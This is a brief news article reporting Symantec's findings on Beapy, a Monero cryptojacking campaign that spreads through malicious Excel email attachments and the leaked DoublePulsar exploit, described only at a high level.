Monero is in the stoplight again, and unfortunately this time the coin is associated with malware mining.
It seems that there’s a dangerous wave of crypto mining malware that has struck the Web.
Infecting thousands of enterprises in Asia
This already managed to infect thousands of high-value enterprises across Asia.
This is known asBeapy, and the malware is using leaked NSA exploits and hacked credentials as well in order to be able to spread via exposed networks as quickly as possible.
According to The Next Web, this malware can also infect matched machines.
Cybersecurity company Symantec which has been tracking the threat has already reported that Beapy is a file-based coinminer that makes use of email as an initial infection vector.
“This campaign demonstrates that while crypto-jacking has declined in popularity with cyber criminals since its peak at the start of 2018, it is still a focus for some of them, with enterprises now their primary target,” Symantec says.
Symantec first recorded Beapy back in January 2019, and it typically infects via email. Activity has reportedly increased since the beginning of March.
Beapy mines Monero (XMR) faster than CoinHive.
How does this work?
The online publication mentioned above explains how this works. Beapy’s initial attack vector is malicious Excel spreadsheets which are distributed in emails in a few instances.
If a recipient opens the attachment, there will be a secondary NSA-built exploit which is known as DoublePulsar which is downloaded.
It’s also interesting to note that this was used by the horrible WannaCry ransomware attackers that shook everyone back in 2017.
This DoublePulsar opens a backdoor on infected machines and allows commands to be executed by the attackers.
Symantec notes that “Once DoublePulsar is installed, a PowerShell command is executed, and contact is made with the Beapy command and control server before a coinminer is downloaded onto the target computer.”